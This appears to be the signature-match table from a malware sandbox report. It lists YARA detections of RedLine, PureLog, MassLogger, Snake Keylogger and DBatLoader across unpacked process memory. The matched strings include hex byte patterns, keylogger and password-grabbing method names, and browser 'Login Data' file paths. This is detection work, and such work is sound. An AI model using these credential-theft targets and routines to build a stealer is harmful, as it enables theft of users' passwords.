21.2.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
26.2.rpkhzpuO.pif.2f7c0000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2fd95570.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.3.rpkhzpuO.pif.31ae57d0.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2d0c4e5e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.rpkhzpuO.pif.264e5570.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.1.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
26.2.rpkhzpuO.pif.2ff20000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.27a90f08.15.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.265ad410.11.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.rpkhzpuO.pif.265ad410.11.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.rpkhzpuO.pif.265ad410.11.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.rpkhzpuO.pif.265ad410.11.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
8.2.rpkhzpuO.pif.265ad410.11.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
31.1.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.rpkhzpuO.pif.25173f56.5.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2f7c0000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.35f30f08.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.35f30f08.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2fdd3d90.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2e323d90.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.2.rpkhzpuO.pif.26523d90.12.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2e2e6478.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.25174e5e.4.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.264e6478.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2ecd0f08.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.3.rpkhzpuO.pif.2350ac48.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2e323d90.7.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
21.2.rpkhzpuO.pif.34ad3d90.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.35f30000.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.1.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
26.2.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
4.2.x.exe.22065a8.1.raw.unpack	JoeSecurity_DBatLoader	Yara detected DBatLoader	Joe Security
26.1.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.rpkhzpuO.pif.280c0000.17.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.3.rpkhzpuO.pif.2d0ead88.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.34a95570.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2eaa3f56.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.25174e5e.4.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.312b0000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.26523d90.12.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2ecd0000.3.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2d0c3f56.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.1.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
26.2.rpkhzpuO.pif.2e2e5570.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.3.rpkhzpuO.pif.31ae57d0.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.1.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.2.rpkhzpuO.pif.265951f0.13.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.rpkhzpuO.pif.265951f0.13.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.rpkhzpuO.pif.265951f0.13.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.rpkhzpuO.pif.265951f0.13.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x283ed:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0x28729:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x2817a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x2829b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x28403:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x29dd3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x29a84:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x29862:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x29d23:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler 0x298bf:$a11: KeyLoggerEventArgsEventHandler
8.2.rpkhzpuO.pif.265951f0.13.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x2d643:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x2cb41:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x2ce4f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data 0x2dc47:$a5: \Kometa\User Data\Default\Login Data
21.2.rpkhzpuO.pif.33783f56.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.33784e5e.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2ecd0000.3.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.280c0000.17.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.27a90f08.15.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2f7c0f08.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.33783f56.2.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.312b0000.11.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2fdd3d90.9.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.400000.3.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
8.2.rpkhzpuO.pif.2657cfc0.14.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.rpkhzpuO.pif.2657cfc0.14.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.rpkhzpuO.pif.2657cfc0.14.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.rpkhzpuO.pif.2657cfc0.14.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
8.2.rpkhzpuO.pif.2657cfc0.14.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x13623:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x12b21:$a3: \Google\Chrome\User Data\Default\Login Data 0x12e2f:$a4: \Orbitum\User Data\Default\Login Data 0x13c27:$a5: \Kometa\User Data\Default\Login Data
31.2.rpkhzpuO.pif.2eaa3f56.1.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.33784e5e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2f7c0f08.10.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2e2e5570.6.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2e2e6478.8.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.400000.0.raw.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x1300:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x2018a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1fdd0:$s5: delete[] 0x1f288:$s6: constructor or from DllMain.
21.2.rpkhzpuO.pif.34a96478.7.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.1.rpkhzpuO.pif.400000.0.unpack	MALWARE_Win_RedLine	Detects RedLine infostealer	ditekSHen	0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E 0x700:$s3: 83 EC 38 53 B0 BD 88 44 24 2B 88 44 24 2F B0 48 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ... 0x1ed8a:$s4: B\|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B 0x1e9d0:$s5: delete[] 0x1de88:$s6: constructor or from DllMain.
8.2.rpkhzpuO.pif.265ad410.11.raw.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.rpkhzpuO.pif.265ad410.11.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.rpkhzpuO.pif.265ad410.11.raw.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.rpkhzpuO.pif.265ad410.11.raw.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0x101cd:$a1: get_encryptedPassword 0x10509:$a2: get_encryptedUsername 0xff5a:$a3: get_timePasswordChanged 0x1007b:$a4: get_passwordField 0x101e3:$a5: set_encryptedPassword 0x11bb3:$a7: get_logins 0x11864:$a8: GetOutlookPasswords 0x11642:$a9: StartKeylogger 0x11b03:$a10: KeyLoggerEventArgs 0x1169f:$a11: KeyLoggerEventArgsEventHandler
8.2.rpkhzpuO.pif.265ad410.11.raw.unpack	MAL_Envrial_Jan18_1	Detects Encrial credential stealer malware	Florian Roth	0x15423:$a2: \Comodo\Dragon\User Data\Default\Login Data 0x14921:$a3: \Google\Chrome\User Data\Default\Login Data 0x14c2f:$a4: \Orbitum\User Data\Default\Login Data 0x15a27:$a5: \Kometa\User Data\Default\Login Data
21.2.rpkhzpuO.pif.35f30000.9.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.27a90000.16.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.3.rpkhzpuO.pif.2d0ead88.0.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
21.2.rpkhzpuO.pif.34a95570.6.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2ff20000.11.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.27a90000.16.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2fd95570.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2eaa4e5e.2.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.3.rpkhzpuO.pif.2b351240.0.raw.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
26.2.rpkhzpuO.pif.2d0c4e5e.1.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.264e6478.10.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
31.2.rpkhzpuO.pif.2fd96478.8.unpack	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
8.2.rpkhzpuO.pif.265951f0.13.unpack	JoeSecurity_MassLogger	Yara detected MassLogger RAT	Joe Security
8.2.rpkhzpuO.pif.265951f0.13.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
8.2.rpkhzpuO.pif.265951f0.13.unpack	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
8.2.rpkhzpuO.pif.265951f0.13.unpack	Windows_Trojan_SnakeKeylogger_af3faa65	unknown	unknown	0xe3cd:$a1: get_encryptedPassword 0xe709:$a2: get_encryptedUsername 0xe15a:$a3: get_timePasswordChanged 0xe27b:$a4: get_passwordField 0xe3e3:$a5: set_encryptedPassword 0xfdb3:$a7: get_logins 0xfa64:$a8: GetOutlookPasswords 0xf842:$a9: StartKeylogger 0xfd03:$a10: KeyLoggerEventArgs 0xf89f:$a11: KeyLoggerEventArgsEventHandler
